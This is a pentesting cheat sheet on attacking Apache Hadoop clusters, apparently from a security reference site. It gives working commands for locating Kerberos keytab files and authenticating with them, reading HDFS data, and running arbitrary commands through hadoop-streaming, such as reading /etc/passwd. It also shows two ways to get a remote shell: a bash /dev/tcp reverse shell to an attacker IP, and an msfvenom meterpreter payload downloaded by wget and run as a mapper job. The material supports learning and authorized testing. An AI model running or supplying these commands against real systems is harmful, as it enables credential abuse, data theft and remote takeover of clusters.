Apache Hadoop Pentesting
Last modified: 2023-04-02
Apache Hadoop is a collection of open-source software utilities that facilitates using a network of many computers to solve problems involving massive amounts of data and computation. It uses ports 8020, 9000, 50010, 50020, 50070, 50075, 50475 by default.
Kyetab files are used to authenticate to the KDC (key distribution center) on Kerberos authentication. To find them, execute the following command in target system.
find / -type f -name *.keytab 2>/dev/null
After finding them, we can use them to gather information or authenticate.
# Gather information from a keytab # -k: Speicifed a keytab file klist -k /path/to/example.keytab # Authenticate to Kerberos server and request a ticket. # <principal_name>: it' stored in example.keytab. Run `klist -k example.keytab` to check it. # -k: Use a keytab # -V: verbose mode # -t <keytab_file>: Filename of keytab to use kinit <principal_name> -k -V -t /path/to/example.keytab # e.g. kinit user/hadoop.docker.com@EXAMPLE.COM -k -V -t /path/to/example.keytab
We can authenticate other services by executing
kinit. Then we can investigate the HDFS service by the following HDFS commands.
When authenticated, we need to find the path of the
hdfs command associated with Hadoop. This command allows us to execute file system command in the datalake.
If the path exists in the default PATH (confirm to run
echo $PATH), we don't have to find them. However, if the path is not set in the default PATH, find it by running the following command.
find / -type f -name hdfs 2>/dev/null
If we find the path, go to the directory and use commands as below.
As mentioned above, if the
hdfs path is not set in the PATH, we need to go to where the
hdfs binary exists.
Basically, their commands are similar to UNIX.
hdfs dfs -help # List files in the hdfs service root. hdfs dfs -ls / # -R: Recursive hdfs dfs -ls /R / # Get the contents of the file hdfs dfs -cat /example.txt
First we need to create arbitrary file that contains at lease one character. Then put it on HDFS.
echo hello > /tmp/hello.txt hdfs dfs -put /tmp/hello.txt /tmp/hello.txt
Now execute below command to execute remote command.
Note that the
-output directory needs to be NOT exist, so if we want to multiple execute command, we have to delete the previous output folder or specify another name.
hadoop jar /path/to/hadoop-streaming-x.x.x.jar -input /tmp/hello.txt -output /tmp/output -mapper "cat /etc/passwd" -reducer NONE
We can see the result of the command in the output directory. For example,
hdfs dfs -ls /tmp/output hdfs dfs -cat /tmp/output/part-00000
In target machine, create a reverse shell script and put it on HDFS.
echo '/bin/bash -i >& /dev/tcp/10.0.0.1/4444 0>&1' > /tmp/shell.sh hdfs dfs -put /tmp/shell.sh /tmp/shell.sh
In local machine, start a listener.
nc -lvnp 4444
Now execute the following command.
# -mapper: The HDFS path of the shell.elf # -file: The system path of the shell.elf hadoop jar /path/to/hadoop-streaming-x.x.x.jar -input /tmp/hello.txt -output /tmp/output -mapper "/tmp/shell.sh" -reducer NONE -file "/tmp/shell.sh" -background
We can get a shell in local machine.
First create a reverse shell payload using msfvenom in local machine and prepare a listener using msfconsole.
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=4444 -f elf > shell.elf msfconsole msf> use exploit/multi/handler msf> set payload linux/x86/meterpreter/reverse_tcp msf> set lhost 10.0.0.1 msf> set lport 4444 msf> run
Transfer the payload to target machine.
wget http://10.0.0.1:8000/shell.elf -O /tmp/shell.elf # Put it on HDFS. hdfs dfs -put /tmp/shell.elf /tmp/shell.elf
Now execute the following command.
# -mapper: The HDFS path of the shell.elf # -file: The system path of the shell.elf hadoop jar /path/to/hadoop-streaming-x.x.x.jar -input /tmp/hello.txt -output /tmp/output -mapper "/tmp/shell.elf" -reducer NONE -file "/tmp/shell.elf" -background
We can get a shell in meterpreter so to spawn the OS shell, run
shell command in the meterpreter.